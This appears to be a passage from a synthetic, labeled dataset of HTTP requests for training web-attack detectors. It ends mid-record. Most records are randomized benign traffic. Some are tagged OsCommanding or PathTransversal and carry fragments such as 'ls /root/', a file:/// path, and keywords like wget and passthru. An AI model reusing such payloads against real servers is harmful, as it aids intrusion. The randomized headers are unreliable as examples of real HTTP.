Upgrade: 5aRp/4.4, fqts/9.9, eeo/3.4, hho/0.4, pitko/1.5
Warning: 755 www.rpcofa7.png "taotesry9p" 
X-Forwarded-For: 118.79.162.108
X-Serial-Number: 00610632074
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43539
Start - Id: 17538
class: Valid
GET /httpal3childPsYNb8/hmgmo/e9@oIJD6ob/o9/u49deun9oonqa.asmx?aubE2Rotwgne7e=29241&arcO1hrh=rkL&msa4=ye-3SuO&3T5IFNCtN_mB=2niMtie%7Cttcs2o1&ilHtc6dNenrbaot=nno&06Dconnect6ED5hfU=ubodyef%27&ihiryapcdeMqA6y=eE0%40orl3document+ywgetseps6&2leredtzsv7thu=pHxubp2q&2Fv6M0yc=29995929 HTTP/1.1
Host: 131.225.0.91
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: s-slmea, iao-tlbrre, n-2b9;q=0.5
Cache-Control: max-stale
Client-ip: 49.240.156.62
Cookie: nh=hro3erry;wtendtyo2=251123989;7naxehlo=toq@m
Cookie2: $Version="7"
Date: Tue, 04 Dec 07 12:25:31 CET
ETag: W/"hdzXRzmYIBU_M9P1Xa7"
Expect: nrt9in
From: eqwswlc@oml3s.net
If-Modified-Since: Thu, 07 Jan 10 01:16:04 CET
If-Unmodified-Since: Mon, 22 Dec 08 06:45:57 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 13 Jul 09 10:06:39 GMT
Max-Forwards: 42
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: y31i oT4idrMo=estc2ua
Authorization: Basic YWVlaHI6dG1lZUk=
Range: -93,-08,01267-
Referer: http://www.hhbyLia.de/aiiltsiu/iaehi/wic3ndI/vOpphOa/eotbpe.html
TE: trailers
Trailer: Cache-Control
User-Agent: Mozilla/1.2 (compatible; Konqueror/9.4; Open BSD i386; aavt; ewDtue)
UA-CPU: StrongARM
UA-Disp: 3316,965,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 845x6872
Via: 3.1 146.228.168.123
Transfer-Encoding: meeee; eno3qOet=essNE7x
Upgrade: qnef/6.1, teHndi/9.7, n5GAtw/8.0, Epe/2.3
Warning: 578 www.cuZgchp.tiff "esuto1wenhlasinfem" "Mon, 23 Mar 09 10:21:32 UTC"
X-Forwarded-For: 235.147.93.170
X-Serial-Number: 8998788877117234588
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17538
Start - Id: 20350
class: Valid
GET /stieOtaeEhnaoNassln/w-74M/or-IreplaceZHEnI/qthg3utJdsnrrtp8Tcl2/soaOc/3gmd4iVemintn19abe.msf? HTTP/1.1
Host: www.tlexlgw.com
Connection: olrsrsja
Accept: audio/basic;q=0.3, image/*
Accept-Charset: x-mac-icelandic;q=0.9, big5;q=0.2, utf-8;q=0.9
Accept-Encoding: *;q=0.5
Accept-Language: *
Cache-Control: ylzni=tecAhq
Client-ip: 236.14.44.77
Cookie: eAenpAatY=ero7k &t&
Cookie2: $Version="36"
Date: Fri, 24 Apr 09 13:56:28 UTC
ETag: "hAQF3BPQemyzgwrn"
Expect: 100-continue
From: lltjost@rpit7E.ch
If-Modified-Since: Sat, 28 Jan 06 20:55:57 UTC
If-Unmodified-Since: Sat, 16 Apr 05 20:30:31 UTC
If-Match: "WrPTMIni1X0qSb."
If-None-Match: "LObQIzqQsK5jvndX"
If-Range: *
Max-Forwards: 24
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: NTLM Y2ltbGtkZmVlaW5qYXRhYWlkZW9haDVvaXNsdGR3bHFMYnQ3
Authorization: Digest nonce
Range: -6349,-64
Referer: http://www.ssirLes.de/tkhpTr2/doto1dm/iuon.php3
TE: trailers
Trailer: Accept-Encoding
User-Agent: mesbctd (pQxmj81m; np2M2t7QWh; g2Jpt-RQ; nNlP99Jk; iIw-Q6lB.)
UA-CPU: StrongARM
UA-Disp: 945,093,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 056x355
Via: 9.1 188.241.81.210, 6.4 www.antn1y.jpg
Transfer-Encoding: gzip
Upgrade: sqiew/4.1, 1n55Nn/3.3, aeif/5.3, csk/5.8
Warning: 417 www.fynjteI.jpg "ghs2Gimymbhauoku" "Tue, 02 Oct 07 18:48:29 CET"
X-Forwarded-For: 11.244.14.65
X-Serial-Number: 11331311370992169456
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20350
Start - Id: 26857
class: Valid
GET /aUM/6DXmNXQ66m/eigzkKOa.Jy0/itieic/atgznoottrosa4Egaon/emtdu551osoet3Ane/ryI4Hadh9erneAtoi/6rksuh/tUM/oiqQsH-Bo2efdO71F1uG/Iqe8.gif?oia=o%243&tuneepNa=cot0g&gvjof=ssag%270lu&oAleoHlgz=tmunogclhl%2F6i&roh4i=TosTLboaiikit&YJA8k3A=cuugmsi5&kCZ7pcj=%5BphDtsb%7C&h3eyhh9guaiIoh=+sur&tya=emgr4lRln8o&pmlbossd8it9S=4htn9dlii9rraEAps&Imocha5P=dheiym HTTP/1.1
Host: www.pA6eongk.cz
Connection: tieGcH
Accept: application/*;q=0.4, image/png;q=0.8
Accept-Charset: x-mac-turkish, iso-2022-kr;q=0.3, cp-950;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: max-age=6222
Client-ip: 53.173.252.98
Cookie: iuc=rE
Cookie2: $Version="91"
Date: Sun, 12 Nov 06 15:13:38 UTC
ETag: W/"pwygvxgH9dhSTlIzhxnl"
Expect: narnunp=svtEad
From: vteseoi@repl.biz
If-Modified-Since: Sun, 27 Dec 09 12:01:16 GMT
If-Unmodified-Since: Mon, 20 Nov 06 16:17:40 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 381
MIME-Version: 8.4
Pragma: l=o4
Proxy-Authorization: nmede xeerdo=aetP
Authorization: Digest realm
Range: -6214
Referer: http://www.ipebnani.biz/oadltNo2/rroi/qs3reS/sen9d/tnd9iee.pdf
TE: deflate,deflate,chunked
Trailer: Pragma
User-Agent: Mozilla/1.6 (Windows; U; WinNT 7.9; tt-ka; rv:3.0.6) Gecko/20571158
UA-CPU: StrongARM
UA-Disp: 1462,2709,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 9604x4951
Via: 7.5 www.ume9eeoL.js:385, 4.2 212.65.142.44, 9.2 www.hNadwEub.shtml:66
Transfer-Encoding: heail; nsbemrgk=awa1
Upgrade: tlets/6.9, Inu/8.7, zfnnt7/5.8
Warning: 936 www.sdeox.html "ieitess8sehaqekHrEgo" 
X-Forwarded-For: 225.193.121.240
X-Serial-Number: 162095
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26857
Start - Id: 14231
class: Valid
GET /a7dRFY95fAAQ405pTe0e/tsA0rnaeaisZueee/tvenhaadmEgY.jpeg?MOC0k3-tZwgetK@=mcxwtmg HTTP/1.0
Host: 27.231.138.21:857
Connection: close
Accept: audio/*;q=0.8, application/*
Accept-Charset: iso-10646-ucs-2;q=0.6, windows-874, cp-936;q=0.1, windows-1257;q=0.3
Accept-Encoding: deflate;q=0.1, gzip;q=0.7, gzip;q=0.6, compress, deflate
Accept-Language: *
Cache-Control: max-stale=29908
Client-ip: 222.155.249.216
Cookie: horeoni=8ne0;VhtaccesJgp=rfe;nnodamn5n=3486929;soeiebsmcoDSdl=19819;Este=97994
Cookie2: $Version="64"
Date: Tue, 28 Nov 06 18:54:01 UTC
ETag: W/"AeZN8RZMmoUH4hCBsnaF"
Expect: 100-continue
From: ytnpe@aitntig.fr
If-Modified-Since: Sun, 19 Jun 05 01:02:10 CET
If-Unmodified-Since: Fri, 16 May 08 16:10:57 GMT
If-Match: *
If-None-Match: "KYNXY-6@d0mDjLlTbQ"
If-Range: *
Max-Forwards: 183
MIME-Version: 0.5
Pragma: ettmTg8=lhD
Proxy-Authorization: iAwt ytdeMtan=qbp5ee
Authorization: Basic ZG1kdHI6a3d2a2F6
Range: -901847,5-685
Referer: /IbddC.mdb
TE: deflate;q=0.0,trailers
Trailer: Accept-Encoding
User-Agent: oJnliace (oDbCOrrp; 65RQIYUg)
UA-CPU: MIPS
UA-Disp: 985,925,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 962x171
Via: FTP/2.5 www.na6moiut.png, FTP/9.2 99.145.117.81:599, xvyf/5.1 118.72.239.53
Transfer-Encoding: identity
Upgrade: nemhde/8.2, tex32o/1.6, 6cPmot/5.9, eiypMx/6.4
Warning: 616 154.56.254.74 "ansu3dtaabmzoDoqtefe" 
X-Forwarded-For: 177.22.102.112
X-Serial-Number: 21052565504410930240
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14231
Start - Id: 30441
class: Valid
GET /erwEsjntecnethis4sa1/eyisrqeeeoGes0llE/yEr_/iite7Umtepsoulsaeca/t1bxtioptapaTl8ek/.Si/lP04passthruD5RAh5fhtacces.js? HTTP/1.0
Host: 60.186.169.232
Connection: Lhssk
Accept: */*
Accept-Charset: utf-8, iso-8859-6;q=0.6, koi8;q=0.8
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=457
Client-ip: 69.55.224.99
Cookie: XJInBQXincludeB=eia ;Lfune=ch2ifnrn4sv;eosee=ofk5j_U@3;rl13tsSEhee=7netr;2oeUho0n=d]ee cne+dte1ssx'g
Cookie2: $Version="2"
Date: Wed, 03 May 06 15:39:28 UTC
ETag: W/"XoqN0cTxBVFjL2X03m@"
Expect: 100-continue
From: pfgeec@7mrgees.com
If-Modified-Since: Mon, 26 Dec 05 03:42:30 UTC
If-Unmodified-Since: Fri, 24 Dec 04 18:54:33 GMT
If-Match: "68D_DUhRTVu_9KQ"
If-None-Match: *
If-Range: "KKhE.T63yuAnCy4F6ezR"
Max-Forwards: 924
MIME-Version: 7.4
Pragma: nwkb7l=efnspov
Proxy-Authorization: 0atelo euOnc=Kdh2
Authorization: NTLM bmViczF6ZU5ucm55YnRheGJvdW9wb200bGl1dWQ5dHRhc3hndW51SGVhaA==
Range: -8,-760245
Referer: http://www.sAtekh6m.gov/Da1Aci.fgf
TE: trailers
Trailer: TE
User-Agent: 4f-2DQLxI6 http://www.ae3ntxmc.de
UA-CPU: PowerPC
UA-Disp: 2452,8346,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 094x400
Via: iwr/6.7 www.amtah.gif:0567, 8.1 www.etgavUt.js, 3.6 www.tzei.js
Transfer-Encoding: Ersmc
Upgrade: dksM/4.0, egtr/5.6, at1f/2.7, Ruilnr/5.9, epf4h3/8.8
Warning: 468 www.emIt4fe.html "irdiBnlnZap" "Mon, 07 Feb 05 01:41:05 UTC"
X-Forwarded-For: 97.116.231.157
X-Serial-Number: 839589841918771
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30441
Start - Id: 26743
class: Valid
GET /eYKPlu91lH66GC4gR/06s1tttezTerknitpt/ra/rgW_G5iBIdD2Z/aafOyRPI9BNdloODa/2TS30xN.asmx? HTTP/1.0
Host: 114.17.60.67
Connection: Nfctrazv
Accept: */*;q=0.4
Accept-Charset: x-mac-roman, utf-8;q=0.9
Accept-Encoding: gzip;q=0.4, identity, compress;q=0.1, identity, deflate
Accept-Language: *
Cache-Control: max-age=7509
Client-ip: 65.249.20.219
Cookie: oh1taaYt1qirR=0998170468;ySo1wXxp_9jshutdownnr=~;9nh=wsng;bPC@5=ePh8PEpE.AoE
Cookie2: $Version="17"
Date: Fri, 02 Apr 04 03:20:46 CET
ETag: W/"zKHC5oP1_ptrfqFVg"
Expect: SlicjSti
From: slnt@rItzvIc.net
If-Modified-Since: Sun, 23 Jul 06 05:17:21 GMT
If-Unmodified-Since: Mon, 17 Sep 07 20:22:29 GMT
If-Match: *
If-None-Match: *
If-Range: "3t8jw1TwSNaskq@"
Max-Forwards: 056
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: trel9e 9e8qd=tce47
Authorization: NTLM YXJkZXRuaWhhdGFJdlpsdDZndW53YWJiZGFxc2FlZTlkdDRzZnRvZW5kYQ==
Range: 18782-,79-10,1-29104
Referer: http://hiye.gov/s2nto3/aosrhllL/Eutriwc/rli9rfdh/rSan.css
TE: trailers,gzip;q=0.4
Trailer: TE
User-Agent: Mozilla/1.1 (compatible; Konqueror/7.2; Windows NT; eFtchnaSs; tdht; ertp)
UA-CPU: MIPS
UA-Disp: 212,9655,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 358x270
Via: 2.1 189.80.107.122
Transfer-Encoding: identity
Upgrade: mrep/3.9, HDF/3.4, hmg/9.6, cFeer/0.4, nbtig/3.6
Warning: 690 159.100.10.222 "ttdrx" 
X-Forwarded-For: 184.128.191.151
X-Serial-Number: 1194043277645
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26743
Start - Id: 16018
class: Valid
GET /udooadsiil/rm/sNENJ1Ez/kXsNFhS1U0fTCnxVwiZl/e1lnNt8NrEre8mnsh7/u@1c57gzkD/N9window.openEbp/yOdw/i-mDTDyw67uz@ibBu7Dz/qQpzIwRzx.dFyThr/eIu.khS@gwX.cfm?oseetcmlxrK=uoue3byi9nadyhrh5e&7MoOr8nrurlofr=88 HTTP/1.1
Host: www.uang.org:6970
Connection: laiemasl
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: hp6f-ey, tipaz-dt5Y;q=0.3, I0ssu-sheun, tbausn-o;q=0.7
Cache-Control: max-stale
Client-ip: 97.66.205.73
Cookie: eeqnsitnf7vr=0606;owl=d-a;xiE2eepOhtexw6s=oNd
Cookie2: $Version="517"
Date: Wed, 01 Apr 09 10:03:29 CET
ETag: "hD-iZHKYJ7r2eIn32"
Expect: 100-continue
From: ioDenuTw@Aree.gov
If-Modified-Since: Sun, 28 Mar 04 07:10:14 UTC
If-Unmodified-Since: Sun, 05 Feb 06 07:58:32 GMT
If-Match: "ceqB@CruitwuF4lCc."
If-None-Match: "2DP.QdeAlQMe1QUK@.Ri"
If-Range: "ZknCJn_hWMmHRilPHjVh"
Max-Forwards: 3
MIME-Version: 5.3
Pragma: no-cache
Proxy-Authorization: NTLM YTRhZWlucW50M2dlb010NmxzdGxoNHFsanBJY3dzeWVhVnR3ZG1hSHRzZU5lbHR0
Authorization: Digest response="fb5bE3caBEc9bF1dFB8F41Cfe0Cd1285"
Range: 120-88552
Referer: http://www.etaeo.net/Othp/tefbxfa/zrbo0.png
TE: trailers
Trailer: Pragma
User-Agent: Mozilla/9.9 (Windows; U; Win98 8.0; 1e-ne; rv:3.8.6) Gecko/82789747
UA-CPU: MIPS
UA-Disp: 049,9339,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 273x3585
Via: FTP/8.0 www.iohelY.jpg:4392, FTP/0.4 216.3.151.249:164, FTP/9.3 116.118.151.232
Transfer-Encoding: identity
Upgrade: pnhh/6.6, iweta/0.9, 8roie/6.1
Warning: 561 www.ei17228.html "tww6cihanh" 
X-Forwarded-For: 199.28.224.223
X-Serial-Number: 72597578959631
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16018
Start - Id: 36706
class: OsCommanding
POST /ehmelcrsiE7v6e/pQjtoU3p_/uVQms1_F2A/ilyaxnin/tM6IrijX8Yt_ZO/Zo6rnvUqhtaccesY.cfm? HTTP/1.0
Content-Length: 127
Content-Language: netsrd
Content-Encoding: deflate
Content-Location: http://www.alOd.cz/ao9a/st4Le/a04Ep/hna3sBDs.mdb
Content-MD5: aHJlOG9rbHZpZXd0T2llbw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 10 Apr 09 06:36:30 UTC
Last-Modified: Thu, 01 Feb 07 08:19:32 GMT
Host: www.dzyr.be:2
Connection: RaEptihe
Accept: video/*, application/*;q=0.0
Accept-Charset: windows-1250, ks_c_5601-1987, koi8-r, x-mac-hebrew;q=0.7, euc-cn
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: no-transform
Client-ip: 24.6.250.56
Cookie: hsontdreTAmirac=rhab0Oo;1sl9so1rb=scripthihragh9i+mts;rWY@mLperlhnK=y%ecmd;rnnmirRlfet=1208
Cookie2: $Version="134"
Date: Wed, 05 May 10 02:20:31 GMT
ETag: W/"LE7CRa2rOJ_8Ht@xs8X"
Expect: 7oiToetn
From: eralt@eApeeioers.de
If-Modified-Since: Tue, 08 Jun 04 08:27:00 CET
If-Unmodified-Since: Mon, 24 Sep 07 15:44:56 GMT
If-Match: *
If-None-Match: "r9M_gIUh-jKg3lHOmA"
If-Range: Tue, 09 Feb 10 24:01:39 UTC
Max-Forwards: 38
MIME-Version: 4.5
Pragma: ter=Bl7cj
Proxy-Authorization: ssrr uentet=otetm
Authorization: Basic TmJzVGRzOmVrcW9weWU=
Range: 426198-
Referer: /A27ur/ahyf/gges.jpeg
TE: chunked;q=0.4
Trailer: Pragma
User-Agent: Mozilla/0.7 (compatible; MSIE 9.0; Windows NT; LioAjlop; iefn)
UA-CPU: StrongARM
UA-Disp: 1584,454,32
UA-Color: color32
UA-Pixels: 654x545
Via: 6.2 www.sp2ynr.js, 5.2 www.iieees.html
Transfer-Encoding: identity
Upgrade: omsr/2.0, rxspop/7.7, osEh/6.9
X-Forwarded-For: 123.125.191.125
X-Serial-Number: 56753790065108318
----: -------------------------

pom0sigbyhf=necsrhn(hY h&ggai1ei=tmahedheit&ie1aarhc0=cQbZ&osGf2ttanWp=\nls     /root/&nio2nOofhdslhw=mexdtrm\heopt e

End - Id: 36706
Start - Id: 23844
class: Valid
GET /KVbetweenYb7z5-uE.pl?tntekmtsofteE4=odde0&tNsnDstR=35&V12FVV=4216&ueeHlbtiinbso=+asth&iesneynosluq=aVn HTTP/1.0
Host: 59.141.51.24
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: no-store
Client-ip: 158.198.144.188
Cookie: geitOi=eYoestechild4e;dtfawhtrpMsa=mo1s2rxnTq8j>t0 ;epoy8tni2=rNnsI
Cookie2: $Version="50"
Date: Sat, 25 Mar 06 12:21:50 GMT
ETag: "TuRdTw-hBPfWNyzx"
Expect: 100-continue
From: iaaodun@atohoee.uk
If-Modified-Since: Thu, 12 Nov 09 15:09:01 UTC
If-Unmodified-Since: Sat, 10 Feb 07 05:53:55 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 01 Feb 06 03:00:49 CET
Max-Forwards: 147
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: s5S43 3arSouon=nibqr
Authorization: Digest cnonce="w4n7b"
Range: 44-
Referer: /rnLe/oollaTe/xBbblE/casm/oaijia.asmx
TE: chunked,trailers
Trailer: From
User-Agent: CShnu7raunGnt8shfpUL
UA-CPU: PowerPC
UA-Disp: 5960,788,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 1738x3451
Via: HTTP/4.1 www.elatls.js:3277
Transfer-Encoding: identity
Upgrade: odi/2.0
Warning: 295 www.crcst0oT.png "dusoeoAdhnzaeht4at" "Mon, 07 Sep 09 24:26:21 UTC"
X-Forwarded-For: 223.106.91.27
X-Serial-Number: 119652447524751
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23844
Start - Id: 44832
class: PathTransversal
GET /havingP_qjrYOcopyo/r5Ro1erutu5n/aOjRot6HiEFunmM4/ySKk0a/KLFc./l7TXkGpxlsq34g/NRsp4pSwl/alt/oaRrkVGC5CUftF18N8PR.css?s2=599&R6BICU-cmd68=3731521&he=file%3A%2F%2F%2FT%3A%2Fnt%2Fijnc%2Foae.xml HTTP/1.0
Host: 50.150.226.197
Connection: close
Accept: image/*;q=0.2, application/*, text/*;q=0.4
Accept-Charset: windows-1254;q=0.2
Accept-Encoding: *;q=0.6
Accept-Language: e9ezi-4sjdaD0t
Cache-Control: no-cache
Client-ip: 159.255.110.223
Cookie: iSiEytfu=49285;spTdyao=iun;cEna=ToniaSsq5elayi1a;hOaVlD9@luAX=jsaphtsar;8aa=ibxla80aadmincmailn;e3sna=oEUuc
Cookie2: $Version="4"
Date: Sat, 04 Jul 09 11:00:20 CET
ETag: W/"1jGtoTUskEbXDpBL"
Expect: 100-continue
From: eosehi@IsoiaSe.uk
If-Modified-Since: Sun, 07 Jun 09 04:15:13 CET
If-Unmodified-Since: Sat, 25 Nov 06 19:15:51 UTC
If-Match: "arvxUYUB2bHptKA2"
If-None-Match: "pKruFK87qFe3B6AmOom"
If-Range: "AwNEyj99C2j5zSWS"
Max-Forwards: 3954
MIME-Version: 3.1
Pragma: eysnbgE='sEdodrmu'
Proxy-Authorization: NTLM cnRhZ25sYWlscmNrMzQweWRwdG9jYW9zZWx0cGVubXZp
Authorization: eH4teM jsxnoc=5ihxiqi
Range: 49-580233,702708-4982,-8
Referer: /htsan6rE/tsbwpq/neiqs.php3
TE: trailers,trailers,trailers
Trailer: From
User-Agent: elgrtd6ig (dZe9ye; e-_kcgC)
UA-CPU: MIPS
UA-Disp: 7018,7530,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 123x704
Via: HTTP/5.3 241.190.43.239:8475, 1.1 109.50.57.136, 5.1 www.fwagr.jpg
Transfer-Encoding: compress
Upgrade: neacoe/5.1, 7qfTia/9.7, negety/9.4, hbiry/6.4
Warning: 479 www.eao96f.png "ldeigihLwAo78oeint" "Mon, 21 Dec 09 20:16:29 UTC"
X-Forwarded-For: 211.195.184.12
X-Serial-Number: 13064
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44832
Start - Id: 9545
class: Valid
GET /uK/incsEecca/sj/sKpWhyfwZexaURYb-.mdb?neI=68nM3&iaodb=rznM1nlnid4Iovl&dIHfwed5tmam0s=8Atwget&vrefnhairca6iis=nntmpith7dwro&zerao=7618554&oitaeYtstatd=aechoees HTTP/1.0
Host: www.rCtq2ke.gov:281
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: shift_jis;q=0.3
Accept-Encoding: gzip, gzip;q=0.2, gzip;q=0.2
Accept-Language: *;q=0.8
Cache-Control: no-cache
Client-ip: 213.104.233.61
Cookie: ubsksr=ibi'cadd- jorfl;aosoadaRdee2=0;notisedcb1oere=mb0vs;dewzmkah3be=01
Cookie2: $Version="5"
Date: Sat, 07 Feb 09 08:15:33 CET
ETag: "VtmsC5M5gserV4zsMu"
Expect: areomeh
From: anp51@cLdyyihltw.st
If-Modified-Since: Mon, 19 Jan 09 17:05:45 GMT
If-Unmodified-Since: Fri, 29 Sep 06 08:35:21 GMT
If-Match: "GE67X7RFjsw.M.gD403"
If-None-Match: "aJZghtDNfByUCo-a26"
If-Range: Fri, 08 Apr 05 18:53:39 GMT
Max-Forwards: 011
MIME-Version: 8.3
Pragma: o='isv'
Proxy-Authorization: NTLM M1J0aGVic3RxdHBodGxsc3RuYW5wZThpcnBkYWhtZnNoZXRuYWhGZWpjYQ==
Authorization: Digest cnonce="xtls5"
Range: -473707,-784763,883586-54671
Referer: /t9im/iiwr0p.txt
TE: gzip,deflate;q=0.5
Trailer: Accept
User-Agent: Mozilla/2.4 (X11; U; Unix 6.1; ka-5s; rv:2.9.3) Gecko/31668357
UA-CPU: StrongARM
UA-Disp: 502,8887,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 1124x1179
Via: etstJ/6.2 188.118.78.83
Transfer-Encoding: identity
Upgrade: 4iso6y/9.0, dql/9.6, mrw/5.2
Warning: 614 242.155.153.165 "dae2EcNelsatoaNl" 
X-Forwarded-For: 144.11.11.49
X-Serial-Number: 2426894
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9545
Start - Id: 25998
class: Valid
GET /dCLZBKBUlPKj0YfuI/yiN_ryt74xe4iFzTJr8l/o0.shtml?sltarhAhn=pnainsert+x+%3Clay&zdneSaminti=aaTu&h8Hetr=includeTstyle&stUadi1eeRvua=322909160&Vk2ak8WZye=5F7G HTTP/1.0
Host: www.4iljHsn.ch
Connection: etdNwer
Accept: image/png, text/html;q=0.5
Accept-Charset: windows-1254, iso-2022-jp
Accept-Encoding: compress;q=0.4, compress;q=0.0
Accept-Language: doo-ceohAeee
Cache-Control: no-transform
Client-ip: 62.190.59.122
Cookie: dwfA9RI2H68J=386;nZA0iMKm5nc=dogltblee;d7s8des=mns
Cookie2: $Version="283"
Date: Sun, 02 Mar 08 08:19:11 CET
ETag: W/"tNOlPNHZn5V6dUhMqh"
Expect: 100-continue
From: DTqDe@hek6bsSofn.biz
If-Modified-Since: Sat, 16 May 09 13:07:59 UTC
If-Unmodified-Since: Sat, 10 Apr 04 10:58:24 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 17 May 04 18:05:10 CET
Max-Forwards: 21
MIME-Version: 9.6
Pragma: p=Ii
Proxy-Authorization: NTLM MWVsYTVjY2lFcjlvc2VFc3plZmVVaGdyZWJpbGFhZXJzb25lZUVzQTRs
Authorization: Digest nonce
Range: -22228,15-
Referer: /riPi/sp2zh/sec6rl/eivEt/Othe.aspx
TE: trailers,gzip;q=0.6,gzip;q=0.8
Trailer: Trailer
User-Agent: Mozilla/1.0 (compatible; Lvohe4; SunOS sun4u; 1nxpss; iytnnos; tdcyI)
UA-CPU: Sparc
UA-Disp: 199,4987,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 8535x949
Via: 5.3 www.tniil.gif, eotp/7.7 www.geaN.png
Transfer-Encoding: compress
Upgrade: eeiepg/7.1, niih/8.9
Warning: 488 www.avaeexA.js:6581 "ocetwnostmfR" "Thu, 04 Oct 07 11:18:19 CET"
X-Forwarded-For: 77.185.209.175
X-Serial-Number: 767328268470976687
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25998
Start - Id: 21387
class: Valid
GET /ainoohiA4/2QVpasswd54yZX/ac22JLE.Xj.js? HTTP/1.0
Host: 81.86.51.166
Connection: close
Accept: */*
Accept-Charset: cp-950, gb2312;q=0.7
Accept-Encoding: gzip;q=0.1, compress;q=0.9, compress;q=0.0, deflate
Accept-Language: gr1re8ar-5hs5r;q=0.2, rnTneG-hn;q=0.3, Bimees-saNo;q=0.7, a-u9;q=0.4, D-d
Cache-Control: lilntcN='y0hdeOc'
Client-ip: 129.180.163.192
Cookie: eisG=6;wnO=7cs
Cookie2: $Version="2"
Date: Wed, 29 Mar 06 23:04:34 GMT
ETag: W/"YppqsIHpE10pCN588"
Expect: 100-continue
From: 6nzmsEZ@elsd.cz
If-Modified-Since: Sun, 14 Dec 08 16:18:53 GMT
If-Unmodified-Since: Fri, 17 Jul 09 19:18:59 UTC
If-Match: *
If-None-Match: "PLx8pcCQJ@87otLxfH"
If-Range: "Fr4I9QbxdXDKWkRG"
Max-Forwards: 0182
MIME-Version: 7.5
Pragma: nay=ss36tc
Proxy-Authorization: Digest opaque="feou"
Authorization: Digest algorithm=EpcDriax
Range: -5
Referer: http://www.ihJb.biz/c7zte/nai1u/q0ocoena.jsp
TE: gzip,trailers,trailers
Trailer: Range
User-Agent: p0b.47LqEk http://www.lInmi.biz
UA-CPU: MIPS
UA-Disp: 0248,8478,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 965x768
Via: tek/9.0 8.18.246.144, 7.4 201.223.82.98, FTP/0.9 www.ctt0.html
Transfer-Encoding: gzip
Upgrade: nme/2.8, wht/3.6, Msods/5.6, apd/5.1
Warning: 043 24.229.27.123 "ortNea7pt" 
X-Forwarded-For: 86.182.5.47
X-Serial-Number: 2418413
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 21387
Start - Id: 7332
class: Valid
PUT /hekgtbe.gif? HTTP/1.0
Content-Length: 103
Content-Language: yderre,ef,o8eobb
Content-Encoding: identity
Content-Location: /lenv/fhln/tahsa/duo8/atl5eou.shtml
Content-MD5: Z2xpNjNoN25Td3VlbGQ3aQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 22 Feb 08 19:18:33 GMT
Last-Modified: Fri, 13 Jul 07 18:46:23 GMT
Host: 50.100.42.132:80
Connection: rsiRxQee
Accept: */*;q=0.3
Accept-Charset: iso-8859-15;q=0.0
Accept-Encoding: gzip, identity;q=0.7, identity
Accept-Language: *
Cache-Control: no-store
Client-ip: 18.53.58.226
Cookie: 8aairi=dbwx3w4;THS@wGRUX=13;lkmpna8la5ee9an=5048;ei3=Muon elogerm;ngqereetaoitxhs=x7sipassthruD=8m1sxterm1Usts
Cookie2: $Version="61"
Date: Sun, 14 Dec 08 04:20:35 UTC
ETag: W/"x.1@yW8wIjiCNMwf"
Expect: esituigt
From: mHrrayts@zrc6snifaP.ch
If-Modified-Since: Thu, 26 May 05 19:27:30 UTC
If-Unmodified-Since: Sat, 30 Sep 06 24:36:57 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 296
MIME-Version: 6.0
Pragma: n='MhrCXhe'
Proxy-Authorization: NTLM Njllcmh0bmxBbnF0T2RhZWh3anVydGRzM25lZG9zZzZ1U3R0UGVqTm8=
Authorization: NTLM bnQ0T25hbm9naGVjdFRpc2JhZGRqb1l5c3JpaHIyYWVhdA==
Range: 8-57,12-302,31375-71
Referer: http://nfvcTotN.biz/taRou5/wtrt/ialn.aspx
TE: trailers,trailers,chunked
Trailer: Transfer-Encoding
